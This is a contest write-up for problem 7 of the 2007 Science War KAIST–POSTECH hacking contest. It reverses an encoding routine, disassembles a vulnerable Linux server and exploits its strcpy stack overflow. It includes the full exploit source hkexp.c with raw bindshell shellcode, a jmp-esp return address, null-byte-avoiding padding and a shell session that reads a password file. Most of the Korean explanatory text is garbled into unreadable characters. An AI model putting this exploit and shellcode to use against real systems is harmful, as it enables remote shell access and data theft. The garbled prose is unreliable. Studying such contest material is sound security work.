--------------------------------
Science War 2007
	KAIST vs POSTECH
	POSTECH vs KAIST

л ŷȸ 7 Ǯ
--------------------------------
-> writer   - hkpco           <-
-> mail&msn - hkpco@korea.com <-
-> homepage - http://hkpco.kr <-
================================
http://sciencewar.wowhacker.org/
================================

* ȸ غⰣ  ð    7 Ͽ  ֽ ̿, 赿Բ 帳ϴ.


ī(or ī) ŷȸ 7  б  Ǯ̸ Ͽϴ.
 Ʒ ϴ.

--
Ư  Ʈ ڰ Է ͸ ϴ  α׷ hackko.exe ֽϴ.
 ־  ּҴ "218.38.54.227" ̸ Ʈ 31337Դϴ.
ش  ͸ ϸ  ȣȭ ƾ ļ  Ŭ̾Ʈ(hackko.exe) ݴϴ.
׷ hackko.exe ڰ Է ͸ "218.38.54.227" Ȱ ȣȭ ƾ  մϴ.
ȣȭ "POSTECH" or "KAIST" , "KAIST" or "POSTECH" ڿ  ϰ Ǹ,
 ̳ʸ ġ URL  ְԵ˴ϴ.

http://218.38.54.227/~hkpco/hackko.exe
let's go.
--

  α׷ urlԴϴ.
--------------------------------------------------------
binary - http://hkpco.joinc.co.kr/science_war/hackko.exe
--------------------------------------------------------

  ý ȯԴϴ.
------------------------------------------------------------------------------------
[hkpco@ns science_war]$ uname -a
Linux ns.joinc.co.kr 2.4.34 #2 Sat Jan 27 11:45:33 KST 2007 i686 i686 i386 GNU/Linux
[hkpco@ns science_war]$ cat /etc/redhat-release
Red Hat Linux release 9 (Shrike)
------------------------------------------------------------------------------------

켱 ־ MFC̳ʸ hackko.exe ϸ "ּ, Ʈ, " Է¹޽ϴ.
ּҿ Ʈ   ̸ ־ְ, ʹ ڰ Ƿ ۼϿ    ֽϴ.
hackko.exe ڰ Է ͸ α׷  ȣȭ ƾ  Ư  Ʈ  ݴϴ.
ǰ ִ  hackko.exe α׷ Ȱ ȣȭ ƾ Ѵٰ   ξ,
ȣȭ "KAIST" or "POSTECH" ڿ ϸ  ̳ʸ ġ url   شٰ  ˷ ־ϴ.
MFC̳ʸ ȣȭ ƾ ã ȣȭ ƾ   "KAIST" or "POSTECH" ȣȭ  ϸ
 ̳ʸ ġ ּҸ ǵ ݴϴ.

 , hackko.exeα׷   ϸ  ͸ α׷ Ư Ʈ ̻   մϴ.
׷, netcat ̳  α׷    ȣȭ ڵ带 ̿Ͽ ͸  ־ մϴ.

ollydbg  ˾Ƴ cryptionԼ callԴϴ.
------------------------------------------------
00401795   . E8 56FEFFFF    CALL hackko.004015F0
------------------------------------------------

ȣȭ ƾ Ʒ ϴ.
-----------------------------------------------------------
004015F0  /$ B8 00280000    MOV EAX,2800
004015F5  |. E8 D6040000    CALL hackko.00401AD0
004015FA  |. 8B9424 0428000>MOV EDX,DWORD PTR SS:[ESP+2804]
00401601  |. 57             PUSH EDI
00401602  |. 8BFA           MOV EDI,EDX
.
.
.
0040164F  |> 881428         |MOV BYTE PTR DS:[EAX+EBP],DL
00401652  |. 8A50 01        |MOV DL,BYTE PTR DS:[EAX+1]
00401655  |. 47             |INC EDI
00401656  |. 40             |INC EAX
00401657  |. 84D2           |TEST DL,DL
00401659  |.^75 D6          \JNZ SHORT hackko.00401631
.
.
00401677  |. 5F             POP EDI
00401678  |. 81C4 00280000  ADD ESP,2800
0040167E  \. C3             RETN
-----------------------------------------------------------


 ȣȭ ƾ   ȣȭ ڵԴϴ.
----------------------------------------------------------
cryption - http://hkpco.joinc.co.kr/science_war/cryption.c
----------------------------------------------------------

cryption  Դϴ.
-----------------------------------------------------------------------------
[hkpco@ns science_war]$ (perl -e 'print "hkpco_korean"') | nc localhost 31337
s`{XzTvd}Zl

[hkpco@ns science_war]$ ./cryption hkpco_korean
t_|W{Swc~Ymb
[hkpco@ns science_war]$ ./cryption hkpco_korean | nc localhost 31337
hkpco_korean
-----------------------------------------------------------------------------


cryption ̿Ͽ ڿ ȣȭ   ϰ Ǹ ȣȭ Ͱ  ƿ ˴ϴ.
KAIST, POSTECH ȣȭ      ̳ʸ url   Դϴ.

---------------------------------------------------------------
[hkpco@ns science_war]$ ./cryption KAIST | nc localhost 31337
http://hkpco.joinc.co.kr/science_war/server
KAIST

[hkpco@ns science_war]$ ./cryption POSTECH | nc localhost 31337
http://hkpco.joinc.co.kr/science_war/server
POSTECH
---------------------------------------------------------------


  url ġ ̳ʸ ޾ мϰڽϴ.

[hkpco@localhost hk]$ wget http://hkpco.joinc.co.kr/science_war/server
--17:43:41--  http://hkpco.joinc.co.kr/science_war/server
           => `server'
Resolving hkpco.joinc.co.kr... 218.234.19.87
Connecting to hkpco.joinc.co.kr|218.234.19.87|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,007 (15K) [text/plain]

100%[=================================================================================>] 15,007        --.--K/s

17:43:41 (4.92 MB/s) - `server' saved [15007/15007]

[hkpco@localhost hk]$ objdump -d server

server:     file format elf32-i386

Disassembly of section .init:

0804856c <_init>:
 804856c:       55                      push   %ebp
 804856d:       89 e5                   mov    %esp,%ebp
 804856f:       83 ec 08                sub    $0x8,%esp
 8048572:       e8 b1 01 00 00          call   8048728 <call_gmon_start>
 8048577:       e8 0c 02 00 00          call   8048788 <frame_dummy>
 804857c:       e8 b7 07 00 00          call   8048d38 <__do_global_ctors_aux>
.
.
.
080487b4 <main>:
 80487b4:       55                      push   %ebp
 80487b5:       89 e5                   mov    %esp,%ebp
 80487b7:       81 ec 18 15 00 00       sub    $0x1518,%esp
 80487bd:       83 e4 f0                and    $0xfffffff0,%esp
 80487c0:       b8 00 00 00 00          mov    $0x0,%eax
 80487c5:       29 c4                   sub    %eax,%esp
 80487c7:       c7 85 fc ea ff ff 01    movl   $0x1,0xffffeafc(%ebp)
 80487ce:       00 00 00
 80487d1:       c7 85 f8 ea ff ff 02    movl   $0x2,0xffffeaf8(%ebp)
 80487d8:       00 00 00
 80487db:       8b 85 fc ea ff ff       mov    0xffffeafc(%ebp),%eax
.
.
 8048ac7:       e8 e8 fa ff ff          call   80485b4 <close@plt>
 8048acc:       83 c4 10                add    $0x10,%esp
 8048acf:       83 ec 0c                sub    $0xc,%esp
 8048ad2:       ff b5 c0 eb ff ff       pushl  0xffffebc0(%ebp)
 8048ad8:       e8 d7 fa ff ff          call   80485b4 <close@plt>
 8048add:       83 c4 10                add    $0x10,%esp
 8048ae0:       b8 00 00 00 00          mov    $0x0,%eax
 8048ae5:       c9                      leave
 8048ae6:       c3                      ret

08048ae7 <decryption>:
 8048ae7:       55                      push   %ebp
 8048ae8:       89 e5                   mov    %esp,%ebp
 8048aea:       57                      push   %edi
 8048aeb:       81 ec 24 28 00 00       sub    $0x2824,%esp
 8048af1:       8d bd f8 d7 ff ff       lea    0xffffd7f8(%ebp),%edi
 8048af7:       fc                      cld
 8048af8:       ba 00 00 00 00          mov    $0x0,%edx
 8048afd:       b8 00 0a 00 00          mov    $0xa00,%eax
.
.
.
 8048d61:       e8 00 00 00 00          call   8048d66 <_fini+0xa>
 8048d66:       5b                      pop    %ebx
 8048d67:       81 c3 c6 11 00 00       add    $0x11c6,%ebx
 8048d6d:       e8 da f9 ff ff          call   804874c <__do_global_dtors_aux>
 8048d72:       8b 5d fc                mov    0xfffffffc(%ebp),%ebx
 8048d75:       c9                      leave
 8048d76:       c3                      ret


server̳ʸ  κ ƮԴϴ.

 804899c:       83 ec 04                sub    $0x4,%esp
 804899f:       6a 20                   push   $0x20
 80489a1:       6a 00                   push   $0x0
 80489a3:       8d 45 d8                lea    0xffffffd8(%ebp),%eax
 80489a6:       50                      push   %eax
 80489a7:       e8 18 fd ff ff          call   80486c4 <memset@plt>
 80489ac:       83 c4 10                add    $0x10,%esp
// memset( %eax(ebp-28) , 0x0 , 0x20 );

 80489af:       83 ec 04                sub    $0x4,%esp
 80489b2:       68 01 14 00 00          push   $0x1401
 80489b7:       6a 00                   push   $0x0
 80489b9:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 80489bf:       50                      push   %eax
 80489c0:       e8 ff fc ff ff          call   80486c4 <memset@plt>
 80489c5:       83 c4 10                add    $0x10,%esp
// memset( %eax(ebp-1438) , 0x0 , 0x1401 );

.
.

 80489ea:       6a 00                   push   $0x0
 80489ec:       68 00 14 00 00          push   $0x1400
 80489f1:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 80489f7:       50                      push   %eax
 80489f8:       ff b5 c0 eb ff ff       pushl  0xffffebc0(%ebp)
 80489fe:       e8 d1 fc ff ff          call   80486d4 <recv@plt>
 8048a03:       83 c4 10                add    $0x10,%esp
// recv( %ebp(0xffffebc0) , %eax(ebp-1438) , 0x1400 , 0x0 );

.
.

 8048a31:       83 ec 08                sub    $0x8,%esp
 8048a34:       83 ec 04                sub    $0x4,%esp
 8048a37:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 8048a3d:       50                      push   %eax
 8048a3e:       e8 a4 00 00 00          call   8048ae7 <decryption>
 8048a43:       83 c4 08                add    $0x8,%esp
 8048a46:       50                      push   %eax
 8048a47:       8d 45 d8                lea    0xffffffd8(%ebp),%eax
 8048a4a:       50                      push   %eax
 8048a4b:       e8 a4 fc ff ff          call   80486f4 <strcpy@plt>
 8048a50:       83 c4 10                add    $0x10,%esp
// strcpy( %eax(ebp-28) , decryption(ebp-1438) );   <- 0xffffffd8(%ebp) is ebp-0x28: the 0x20-byte buffer zeroed by the first memset


Ʈ  غ  ϴ.

--
socket(..);
bind(..);
listen(..);

while(1)
{
	accept(..);

	memset( %eax(ebp-40) , 0x0 , 0x20 );
	memset( %eax(ebp-5176) , 0x0 , 0x1401 );

	recv( %ebp(0xffffebc0) , %eax(ebp-5176) , 0x1400 , 0x0 );
	strcpy( ebp-40 , decryption(ebp-5176) );	// same 0x20-byte buffer as the first memset; strcpy applies no length check
}

send(..);
--

socket, bind, listen, accept Ͽ   , buffer(ebp-36, ebp-5176) ʱȭ  ,
recvԼ   (ebp-5176) ִ 0x1400ũ ͸ ޾ƿɴϴ.
׸   ۸ decryptionԼ ȣȭ   ebp-36 ϰ Ǵ  BOF ߻մϴ.

 Ǳ ؼ bruteforce õؾ  ۰ ۱  return address ޺κп ϴ 
ų  ڵ( bindshell, reverse telnet  )    bruteforce ؾ մϴ.
  ̳ʸ ڼ 캸 Ǹ ѹ  ų  ִ Ǹ ã  ֽϴ.

----------------------------------------------------
 80487e9:       ff e4                   jmp    *%esp
----------------------------------------------------

  ̳ʸ ο jmp *%esp  ϴµ, ̸ ̿ϸ   ų  ֽϴ.
payload   մϴ.

-----------------------------------
[buffer][ret][....]
[AAA...AA][jmp_esp addr][bindshell]
-----------------------------------

return address jmp_esp ġ ּҰ ְ,  ڿ bindshellڵ带 ϰ Ǹ ڽμ Ҹκп
jmp_esp Ǿ esp ( ⼭ esp return address   Ű  )ϰ Ǿ
bindshell ڵ带   Դϴ.   jmp esp  ڼ  ϰڽϴ.

   Ȯ payload  ,
ebp-36 ϴ buffer overflow Ͼ   44Ʈ ͸ Ͽ ebp ä  ֽϴ.
return address jmp_esp ּҰ 0x80487e9 ־  , ٷ ڿ bindshellڵ带 մϴ.
׷ 44Ʈ Ͱ ebp , jmp_esp ġ ּҰ  esp ϰ Ǵµ  
bindshellڵ尡 ġ ̸,     ų  ִ Ư Ʈ ְ ˴ϴ.

׷ EXPLOITۼ  ؾ   ֽϴ.
ȣȭ ڵ带 ̿Ͽ ͸ ȣȭ   ߰ nullڰ Ե  ִµ, sendԼ ۵ ̸
strlen(cryption(data))   ϸ nullbyte data  ̷ νϹǷ ü payload
   ϴ.
sendԼ ־ ̰  ũ ־  Ǵ,  Ŭ̾Ʈ  ۹ ͸
 descryptionԼ ȣȭ ϰ Ǵµ, ⼭ strlenԼ ϱ    ̿ 
nullڸ   νϰԵǹǷ ڵ ü    Ե˴ϴ.

⿡  ذå ã ؼ ȣȭ ڵ Ư Ģ ľ , ڵ带 籸 ؾ մϴ.
cryption data() ̿  ȣȭ Ǵ Ͱ ޶ Դϴ.
׷ٸ payload ̸ 1byte Ű  ̰  Ģ ȣȭ    nullbyte
   Դϴ. payload Ʒ  ˴ϴ.

[AAA..AA][jmp_esp addr][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 

[AAA..AA][jmp_esp addr][NOP][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 

[AAA..AA][jmp_esp addr][NOPNOP][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 
.
.
.

bindshellպκп NOP 1byte Ű cryption  nullbyte ԵǴ üũմϴ.
nullbyte Ȯνÿ   Ϲ ڿ Լ ϸ ȵȴٴ Դϴ.
ڿ Լ ⺻ nullbyte      Ϳ  ̿Ͽ Ȯ ؾ մϴ.
nullbyteüũ   Լ  ϴ.

/*
 * Report whether the first l bytes at get_p contain a zero byte.
 *
 * The length is passed in explicitly: the data being inspected may hold an
 * embedded zero byte, so strlen() on it would stop at the very byte this
 * function is looking for.  Prints the length being checked, plus a marker
 * line when a zero byte is found.
 *
 * Returns 1 if a zero byte is present, 0 otherwise (including l <= 0).
 */
int check_null( char *get_p, int l )
{
	char *cursor = get_p;
	int remaining;

	printf( "payload: %dbyte\n" , l );

	for( remaining = l ; remaining > 0 ; remaining-- )
	{
		if( *cursor++ != 0 )
			continue;

		printf( "\t [null found]\n\n" );
		return 1;
	}

	printf("\n");
	return 0;
}

cryption ͸ ͷ Ѱܹ , 1byte ϸ nullbyte  Ǵմϴ.
 , ι° ڿ cryption () ̸ ް Ǵµ,  ־ ȣȭ/ȣȭ ƾ 
򹮰 ȣ ̰ 1:1  ϹǷ nullbyte Ե  ڵ() ̸ Ѱִ Դϴ.

check_null()Լ ߰   ٽɺ ڵ  ϴ.

/*
 * Rebuild the payload with one more 0x90 pad byte on each pass until its
 * encoded form contains no zero byte (check_null() returns 1 while one is
 * still present).
 */
do
{
	/* cnt is post-incremented: the first pass writes no pad bytes at all. */
	/* NOTE(review): cnt is never compared with the size of dummy, which is
	 * declared outside this excerpt -- confirm the loop cannot run past it. */
	memset( dummy , '\x90' , cnt++ );
	snprintf( payload , sizeof(payload) -1 , "%s%s%s%s" , buffer , jmp_esp , dummy , bindsc );

	#ifdef DEBUG
		/* A is the strlen() of the encoded data, B the plaintext length;
		 * A < B means the encoding produced a zero byte. */
		printf( "A: %d\n" , strlen(cryption(payload)));
		printf( "B: %d\n" , strlen(payload));
	#endif
	/* The scan length comes from the plaintext: strlen() on the encoded
	 * bytes would stop at the zero byte being searched for. */
} while(check_null( cryption(payload) , strlen(payload) ));


check_null()Լ nullbyte ϸ 1  ֹǷ ȣȭ Ϳ nullbyte Ե  
ݺ  ǰ ˴ϴ. dummy ͵  nullbyte    1byte ߰˴ϴ.

̷ ۼ  EXPLOIT ̿  Դϴ.
EXPLOIT ڷδ ebp ä  dummy size Էմϴ.
⼭ dummy size տ  44byteԴϴ.

--
[hkpco@ns science_war]$ gcc -o hkexp hkexp.c
[hkpco@ns science_war]$ ./hkexp 44

        payload: 258byte
                 [null found]


        payload: 259byte

================
exploit success!
================

id
uid=511(hkpco) gid=513(hkpco) groups=513(hkpco)

ls -al
total 36
drwxrwxr-x    2 hkpco    hkpco        4096 Sep 16 00:39 .
drwxrwxr-x    3 hkpco    hkpco        4096 Sep 16 16:51 ..
-rw-rw-r--    1 hkpco    hkpco          13 Sep 16 00:40 PASSWORD
-rwxrwxr-x    1 hkpco    hkpco       23766 Sep 16 00:39 server

cat PASSWORD
ChanAm, Park
--

н "ChanAm, Park" Դϴ.


-----------------------------------------------------------------------------------------------
ġ..
--------
	̾𽺿 ŷȸ غ ΰ  ð Ͽϴ.
	ȸⰣ   Ǯֽ POSTECH & KAIST, KAIST & POSTECH е鲲 帮,
	       ִ ִ ̾ϴ.
	⿣    ãƺ˰ڽϴ.
	մϴ.
-----------------------------------------------------------------------------------------------

=============================================
SERVER SOURCE CODE
http://hkpco.joinc.co.kr/science_war/server.c
=============================================

======================================================
EXPLOIT source code
hkexp.c - http://hkpco.joinc.co.kr/science_war/hkexp.c
======================================================

- hkexp.c -
/*
	Science War Hacking Contest
	problem7 EXPLOIT by hkpco

	KAIST vs POSTECH
	POSTECH vs KAIST
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Address of the service under test; main() and attack_check() both connect here. */
#define ADR "127.0.0.1"
/* TCP port main() connects to in order to deliver the payload. */
#define TG_PORT 31337
/*
 * TCP port attack_check() probes after the payload is sent.
 * 45295 == 0xb0ef, the two bytes \xb0\xef embedded in bindsc, so a new
 * listener on this port is the observable sign that the payload ran.
 */
#define RS_PORT 45295
/* Uncomment to print the encoded and plaintext payload lengths in main(). */
//#define DEBUG

/* Assembled payload: buffer + jmp_esp + pad + bindsc (built with snprintf in main). */
char payload[4096*2] = {0x00,};
/* Filler bytes ('A'), argv[1] of them, written by main(). */
char buffer[1024] = {0x00,};
/*
 * Little-endian 0x080487e9: the address of the `jmp *%esp` instruction shown
 * in the server's disassembly.  Hard-coded, so it only matches that exact
 * server build.
 */
char jmp_esp[] = "\xe9\x87\x04\x08"; // jmp_esp addr
char bindsc[] =	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
		"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
		"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
		"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
		"\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
		"\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
		"\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
		"\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
		"\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
		"\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
		"\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
		"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
		"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
		"\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; // bindshell code

/* Encode a NUL-terminated string with the length-keyed add/subtract transform. */
char *cryption( char *data );
/* Probe ADR:RS_PORT; 1 = connected (relay session ran), 0 = connect failed, -1 = socket() failed. */
int attack_check( void );
/* Relay data between sockfd and stdin/stdout using select(). */
void socket_shell( int sockfd );
/* Return 1 if any of the first l bytes at get_p is zero, else 0. */
int check_null( char *get_p, int l );

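/*
 * Proof-of-concept driver for the contest's lab service (ADR:TG_PORT).
 *
 * argv[1] is the count of filler bytes written to `buffer` ahead of the
 * 4-byte jmp_esp value.  The payload is rebuilt with a growing 0x90 pad
 * until its encoded form has no zero byte, sent once, and attack_check()
 * then probes RS_PORT.
 *
 * Server-side root cause, as shown in the write-up's disassembly: up to
 * 0x1400 received bytes are decoded and strcpy()'d into a 0x20-byte stack
 * buffer.  A length-bounded copy in the server removes the overflow.
 *
 * Returns 0 once the attempt has been made, -1 on bad usage or on a
 * socket/connect/send failure.
 */
int main( int argc , char **argv )
{
	int sockfd;
	long fill;
	size_t pad;
	char *end;
	char dummy[512]={0x00,};
	struct sockaddr_in sock;

	if( argc < 2 )
	{
		fprintf( stderr , "i need dummy size\n" );
		return -1;
	}

	/*
	 * The filler count sizes a memset() into the fixed 1024-byte `buffer`,
	 * so reject anything that is not a number or that would leave no room
	 * for the terminating NUL ("%s" below relies on it).
	 */
	fill = strtol( argv[1] , &end , 10 );
	if( end == argv[1] || *end != '\0' || fill < 0 || fill >= (long)sizeof(buffer) )
	{
		fprintf( stderr , "dummy size must be 0..%lu\n" , (unsigned long)(sizeof(buffer) - 1) );
		return -1;
	}

	sockfd = socket( PF_INET , SOCK_STREAM , 0 );
	if( sockfd < 0 )
	{
		perror( "socket()" );
		return -1;
	}

	memset( &sock , 0 , sizeof(sock) );
	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(ADR);
	sock.sin_port = htons(TG_PORT);

	if( (connect( sockfd , (struct sockaddr *)&sock , sizeof(sock))<0) )
	{
		perror( "connect()" );
		close(sockfd);
		return -1;
	}

	memset( buffer , 'A' , (size_t)fill );

	/*
	 * send() below sizes the data with strlen(), so an encoded zero byte
	 * would cut the transmission short.  The encoding key is the payload
	 * length, so adding one pad byte changes every encoded byte; retry
	 * until the encoded form is zero-free.
	 */
	pad = 0;
	for( ;; )
	{
		memset( dummy , '\x90' , pad );
		snprintf( payload , sizeof(payload) -1 , "%s%s%s%s" , buffer , jmp_esp , dummy , bindsc );

		#ifdef DEBUG
			printf( "A: %lu\n" , (unsigned long)strlen(cryption(payload)));
			printf( "B: %lu\n" , (unsigned long)strlen(payload));
		#endif

		if( !check_null( cryption(payload) , (int)strlen(payload) ) )
			break;

		/* Keep the last byte of dummy as its NUL terminator. */
		if( ++pad >= sizeof(dummy) )
		{
			fprintf( stderr , "no zero-free encoding within %lu pad bytes\n" ,
				(unsigned long)(sizeof(dummy) - 1) );
			close(sockfd);
			return -1;
		}
	}

	if( send( sockfd , cryption(payload) , strlen(cryption(payload)) , 0 ) < 0 )
	{
		perror( "send()" );
		close(sockfd);
		return -1;
	}

	usleep(7000);
	/* attack_check() returns -1 when it cannot create a socket; report that too. */
	if( attack_check() <= 0 )
		printf( "! exploit failed !\n" );

	close(sockfd);
	return 0;
}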

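/*
 * Encode a NUL-terminated string with the length-keyed transform.
 *
 * The key is strlen(data).  For an even length the key is added to bytes at
 * even offsets and subtracted from bytes at odd offsets; for an odd length
 * the signs are swapped.  Example: "hkpco_korean" (12 bytes) becomes
 * "t_|W{Swc~Ymb".
 *
 * An encoded byte can come out as zero, so strlen() on the result may be
 * shorter than the input; callers that need the full length must use the
 * input's length instead.
 *
 * Returns a pointer to an internal static buffer that is overwritten by the
 * next call (not reentrant).  The previous version returned the address of
 * a local array, which is invalid once the function returns.  Input longer
 * than the buffer is truncated instead of being written past its end.
 */
char *cryption( char *data )
{
	static char output[4096*2];
	size_t i;
	int key;

	/* Start from an all-zero buffer on every call, as the local array did. */
	memset( output , 0 , sizeof(output) );

	key = (int)strlen(data);
	if( key % 2 )
		key = -key;

	for( i = 0 ; data[i] != '\0' && i < sizeof(output) - 1 ; i++ )
	{
		/* The sign of the key alternates with the byte offset. */
		int step = (i % 2) ? -key : key;

		output[i] = (char)(data[i] + step);
	}
	output[i] = '\0';
	return output;
}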

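/*
 * Probe ADR:RS_PORT to see whether a listener is accepting connections.
 *
 * On a successful connect a banner is printed and the connection is handed
 * to socket_shell(); the socket is closed when that call returns.
 *
 * Returns 1 if the connect succeeded, 0 if it was refused or failed, and
 * -1 if the probe socket could not be created.
 */
int attack_check( void )
{
	int sockfd;
	struct sockaddr_in target_addr;

	/* memset() rather than bzero(): <strings.h> is not included by this file. */
	memset( &target_addr , 0 , sizeof(target_addr) );
	target_addr.sin_family = AF_INET;
	target_addr.sin_port = htons(RS_PORT);
	target_addr.sin_addr.s_addr = inet_addr(ADR);

	sockfd = socket( AF_INET, SOCK_STREAM, 0 );
	if( sockfd < 0 )
	{
		/* The failing call here is socket(), not connect(). */
		perror( "socket(attack_check)" );
		return -1;
	}

	if( connect(sockfd, (struct sockaddr *)&target_addr, sizeof(target_addr)) == -1 )
	{
		close(sockfd);
		return 0;
	}

	printf( "================\n" );
	printf( "exploit success!\n" );
	printf( "================\n\n" );
	socket_shell(sockfd);

	/* Release the descriptor if the relay ever returns. */
	close(sockfd);
	return 1;
}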

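/*
 * Relay bytes between a connected socket and the terminal: data arriving on
 * sockfd is written to stdout (fd 1), data read from stdin (fd 0) is sent to
 * sockfd.  select() blocks until one of the two is readable.
 *
 * Returns when the peer closes the connection, stdin reaches end-of-file, or
 * any of the I/O calls fails.  Previously these cases were ignored: a closed
 * peer left select() reporting "readable" in a tight loop, and a failed
 * read() passed -1 to send() as the length.
 */
void socket_shell( int sockfd )
{
	char data[4096 +1];
	fd_set fds;
	ssize_t got;

	for( ;; )
	{
		FD_ZERO(&fds);
		FD_SET( sockfd , &fds );
		FD_SET( 0 , &fds );

		if( select( sockfd +1 , &fds , NULL , NULL , NULL ) < 0 )
		{
			perror( "select()" );
			return;
		}

		if( FD_ISSET( sockfd , &fds ) )
		{
			got = recv( sockfd , data , sizeof(data) -1 , 0 );
			if( got <= 0 )
				return;	/* 0: peer closed, <0: error */

			if( write( 1 , data , (size_t)got ) < 0 )
				return;
		}
		if( FD_ISSET( 0 , &fds ) )
		{
			got = read( 0 , data , sizeof(data) -1 );
			if( got <= 0 )
				return;	/* 0: end of input, <0: error */

			if( send( sockfd , data , (size_t)got , 0 ) < 0 )
				return;
		}
	}
}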

/*
 * Scan the first l bytes at get_p for a zero byte.
 *
 * The caller supplies the length because the data may contain the zero byte
 * being searched for, which rules out strlen().  Prints the length checked
 * and, when a zero byte is found, a marker line.
 *
 * Returns 1 when a zero byte is found, 0 when none is (or when l <= 0).
 */
int check_null( char *get_p, int l )
{
	int idx = 0;

	printf( "\n\tpayload: %dbyte\n" , l );

	while( idx < l )
	{
		if( get_p[idx] == 0 )
		{
			printf( "\t\t [null found]\n\n" );
			return 1;
		}
		idx++;
	}

	printf("\n");
	return 0;
}
